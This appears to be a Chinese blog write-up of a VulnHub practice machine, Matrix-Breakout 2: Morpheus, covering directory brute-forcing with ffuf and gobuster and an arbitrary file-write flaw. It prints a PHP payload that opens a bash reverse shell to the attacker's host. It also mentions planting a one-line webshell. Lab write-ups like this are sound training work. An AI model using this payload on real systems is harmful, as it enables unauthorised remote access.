vulnhub靶场渗透实战15-matrix-breakout-2-morpheus
vulnhub靶场渗透实战15-matrix-breakout-2-morpheus靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。
靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
网络模式:桥接。
一:信息收集
https://img2023.cnblogs.com/blog/2789103/202302/2789103-20230208103535967-1912682083.png
2;访问端口信息。三位一体不会玩。
https://img-blog.csdnimg.cn/cbd471509c26476ba1c348341fd519d6.png
https://img-blog.csdnimg.cn/a701e1b71d614c028c75ef1aec5949f5.pnghttps://img2023.cnblogs.com/blog/2789103/202302/2789103-20230208103626611-149913616.gif
3;目录爆破一下,继续寻找。
https://img-blog.csdnimg.cn/4e7ccef295504300bfff3f4a0f70f5f8.png
https://img-blog.csdnimg.cn/357618b77fdf486581358a1df4502b7d.png
4;文件爆破一下,
ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html<br>gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.ziphttps://img-blog.csdnimg.cn/a4a32d654424456c867e626bb7154827.png
https://img-blog.csdnimg.cn/f3956f4fb03f48e59a4e5312496c672c.png
5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。
https://img-blog.csdnimg.cn/c648faedebb54b88b93d58b877e65683.png
二:漏洞利用。
1;burp抓包看一下数据包,
这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>https://img2023.cnblogs.com/blog/2789103/202302/2789103-20230208103103013-194462858.png
四:总结
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。
2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。
3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]